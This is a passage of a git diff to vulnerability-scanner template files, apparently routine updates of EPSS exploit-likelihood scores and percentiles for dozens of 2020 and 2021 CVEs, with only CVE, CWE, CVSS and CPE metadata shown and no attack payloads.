a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-8209 cwe-id: CWE-22 epss-score: 0.97043 - epss-percentile: 0.99695 + epss-percentile: 0.99702 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 93352f1824..cae744aa03 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8497 cwe-id: CWE-306 epss-score: 0.002 - epss-percentile: 0.57673 + epss-percentile: 0.5784 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 26906cc1e2..4c9bb6d62b 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-8512 cwe-id: CWE-79 epss-score: 0.01373 - epss-percentile: 0.84763 + epss-percentile: 0.8485 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index af09213628..2f3b7d4f86 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 - epss-score: 0.9699 - epss-percentile: 0.99672 + epss-score: 0.97079 + epss-percentile: 0.99723 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 63275e7356..ef5e69d3bb 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 - epss-score: 0.00658 - epss-percentile: 0.7719 + epss-score: 0.00479 + epss-percentile: 0.73233 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index d251799f41..b0e0566982 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.0071 - epss-percentile: 0.78211 + epss-percentile: 0.7833 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index daf7bbee32..b78b51abbb 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 - epss-score: 0.95707 - epss-percentile: 0.99264 + epss-score: 0.96028 + epss-percentile: 0.99356 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index e7534ab608..de8405f185 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8654 cwe-id: CWE-78 epss-score: 0.04987 - epss-percentile: 0.91982 + epss-percentile: 0.9205 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index e41be0e922..705562951d 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8771 cwe-id: CWE-287 - epss-score: 0.06142 - epss-percentile: 0.92769 + epss-score: 0.07621 + epss-percentile: 0.93504 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index b384044df5..56ef0380f6 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8772 cwe-id: CWE-862 - epss-score: 0.96452 - epss-percentile: 0.99467 + epss-score: 0.96607 + epss-percentile: 0.9954 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 5f94ae8130..36bf4ced54 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 - epss-score: 0.9467 - epss-percentile: 0.9906 + epss-score: 0.95033 + epss-percentile: 0.9913 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 13ca54d519..052b9da72d 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-8982 cwe-id: CWE-22 epss-score: 0.81478 - epss-percentile: 0.9806 + epss-percentile: 0.98074 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index 466a85e140..c3c149ef41 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44511 + epss-percentile: 0.44613 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index eb22c3f057..ac3baaeb4a 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 - epss-percentile: 0.91266 + epss-percentile: 0.91333 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index dae0407eac..151fcb32b9 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-9047 cwe-id: CWE-347 - epss-score: 0.00937 - epss-percentile: 0.81231 + epss-score: 0.00782 + epss-percentile: 0.7944 cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index afebfb101a..384ae6a266 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - epss-score: 0.96999 - epss-percentile: 0.99677 + epss-score: 0.96978 + epss-percentile: 0.99679 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index c6d803b6c1..1c723e6553 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9315 cwe-id: CWE-306 - epss-score: 0.97337 - epss-percentile: 0.99865 + epss-score: 0.97353 + epss-percentile: 0.99881 cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 1e4c06bf76..a54f642685 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58262 + epss-percentile: 0.58416 cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 69ef5249e3..a336ce62a4 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9376 cwe-id: CWE-74 - epss-score: 0.97087 - epss-percentile: 0.99717 + epss-score: 0.96966 + epss-percentile: 0.99676 cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 11e55d17e7..3e22747931 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-9402 cwe-id: CWE-89 epss-score: 0.146 - epss-percentile: 0.95214 + epss-percentile: 0.95232 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 21fa4b803f..e20e6fdad0 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-9425 cwe-id: CWE-670 epss-score: 0.01611 - epss-percentile: 0.86032 + epss-percentile: 0.86058 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index e844b18aaa..efba90263c 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-9483 cwe-id: CWE-89 epss-score: 0.0522 - epss-percentile: 0.92185 + epss-percentile: 0.92246 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index d8442b2745..cb31e3fe0e 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -26,8 +26,8 @@ info: cvss-score: 7 cve-id: CVE-2020-9484 cwe-id: CWE-502 - epss-score: 0.8836 - epss-percentile: 0.98397 + epss-score: 0.8875 + epss-percentile: 0.98456 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 1fa96f5e85..5867da6c7e 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-9496 cwe-id: CWE-502 - epss-score: 0.97338 - epss-percentile: 0.99865 + epss-score: 0.9739 + epss-percentile: 0.99907 cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index fe6dc0c2ed..1c5f4e6e13 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.96928 - epss-percentile: 0.99654 + epss-score: 0.96768 + epss-percentile: 0.996 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index da2541f3d6..6b4ef57fc2 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1472 cwe-id: CWE-287,CWE-119 - epss-score: 0.97255 - epss-percentile: 0.99813 + epss-score: 0.97174 + epss-percentile: 0.9977 cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index ce902d8825..3cd82972cd 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1497 cwe-id: CWE-78 - epss-score: 0.97499 - epss-percentile: 0.99977 + epss-score: 0.97485 + epss-percentile: 0.99968 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 7155ec2077..6d6e6c6d4a 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-1498 cwe-id: CWE-78 - epss-score: 0.97499 - epss-percentile: 0.99977 + epss-score: 0.97485 + epss-percentile: 0.99968 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index bc796e8fc2..f79684be3c 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - epss-score: 0.96404 - epss-percentile: 0.9945 + epss-score: 0.95931 + epss-percentile: 0.99333 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 4ca77bfc84..7482658333 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20031 cwe-id: CWE-601 epss-score: 0.01202 - epss-percentile: 0.83575 + epss-percentile: 0.8368 cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 1e1f58d50c..9983405198 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20038 cwe-id: CWE-787,CWE-121 - epss-score: 0.95635 - epss-percentile: 0.99247 + epss-score: 0.95092 + epss-percentile: 0.99142 cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index d4a87bcb83..a4cb888ab1 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20090 cwe-id: CWE-22 - epss-score: 0.97108 - epss-percentile: 0.99727 + epss-score: 0.97203 + epss-percentile: 0.99786 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index c6a1707098..313b4faa28 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.8 cve-id: CVE-2021-20091 epss-score: 0.00928 - epss-percentile: 0.81154 + epss-percentile: 0.81222 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 2e12931a51..3cf532df1a 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20092 cwe-id: CWE-287 - epss-score: 0.01129 - epss-percentile: 0.82973 + epss-score: 0.01122 + epss-percentile: 0.83024 cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index d93eba5763..739a92ff76 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20114 cwe-id: CWE-425 epss-score: 0.01918 - epss-percentile: 0.87263 + epss-percentile: 0.87318 cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 6e126c54e2..29daff4831 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20123 cwe-id: CWE-22 epss-score: 0.03116 - epss-percentile: 0.90018 + epss-percentile: 0.90065 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 57a26a8bf1..e451026194 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20124 cwe-id: CWE-22 epss-score: 0.01234 - epss-percentile: 0.83834 + epss-percentile: 0.83934 cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index b6e4cc8a29..1f43ccc5fd 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-20137 cwe-id: CWE-79 epss-score: 0.24456 - epss-percentile: 0.96166 + epss-percentile: 0.96192 cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 66617f48cf..9a6c833756 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20150 cwe-id: CWE-306 epss-score: 0.19434 - epss-percentile: 0.95788 + epss-percentile: 0.95837 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index fb3586a07f..6b0847f363 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - epss-percentile: 0.83649 + epss-percentile: 0.83754 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 7959c899f0..d431d850aa 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -15,8 +15,8 @@ info: cvss-score: 8 cve-id: CVE-2021-20167 cwe-id: CWE-77 - epss-score: 0.95492 - epss-percentile: 0.99213 + epss-score: 0.94785 + epss-percentile: 0.99096 cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 43779fe70f..27bd80ca15 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -22,8 +22,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20323 cwe-id: CWE-79 - epss-score: 0.00198 - epss-percentile: 0.57473 + epss-score: 0.00173 + epss-percentile: 0.54434 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index b379aa7995..4e128e527a 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-20792 cwe-id: CWE-79 epss-score: 0.002 - epss-percentile: 0.57728 + epss-percentile: 0.57896 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 7d0c8754f5..504bfb6a67 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.97024 - epss-percentile: 0.99689 + epss-percentile: 0.99695 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index c17221fa6d..7dd221928e 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 - epss-score: 0.00293 - epss-percentile: 0.65736 + epss-score: 0.00326 + epss-percentile: 0.67709 cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: max-request: 7 diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index c4bb6ab017..1319fca893 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2021-21234 cwe-id: CWE-22 epss-score: 0.96646 - epss-percentile: 0.9954 + epss-percentile: 0.99551 cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index b0f8259412..d50752d501 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 - epss-score: 0.97116 - epss-percentile: 0.99735 + epss-score: 0.97112 + epss-percentile: 0.99741 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 9f6b181e12..e63e2377d5 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 - epss-score: 0.97292 - epss-percentile: 0.99844 + epss-score: 0.97312 + epss-percentile: 0.99858 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index ec8587d996..4e4ca675c0 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 - epss-score: 0.01052 - epss-percentile: 0.82308 + epss-score: 0.01485 + epss-percentile: 0.85417 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 4ca3106a2c..21afaf6139 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.8 cve-id: CVE-2021-21315 cwe-id: CWE-78 - epss-score: 0.96864 - epss-percentile: 0.99624 + epss-score: 0.96949 + epss-percentile: 0.99668 cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 228344ba08..8bbd11b164 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.4876 - epss-percentile: 0.97185 + epss-percentile: 0.97202 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index b42fa73cd0..71e66db03e 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.77865 - epss-percentile: 0.97932 + epss-score: 0.73239 + epss-percentile: 0.97828 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 95226f2619..b77155f374 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-21389 cwe-id: CWE-863 - epss-score: 0.75391 - epss-percentile: 0.97862 + epss-score: 0.80915 + epss-percentile: 0.9805 cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 07c3dee71d..2e84e02554 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21402 cwe-id: CWE-22 epss-score: 0.15589 - epss-percentile: 0.9537 + epss-percentile: 0.9539 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 2c066bab0e..3712478a9f 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21479 cwe-id: CWE-74 epss-score: 0.00362 - epss-percentile: 0.69203 + epss-percentile: 0.69355 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 435dcc0353..675a84d20a 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ 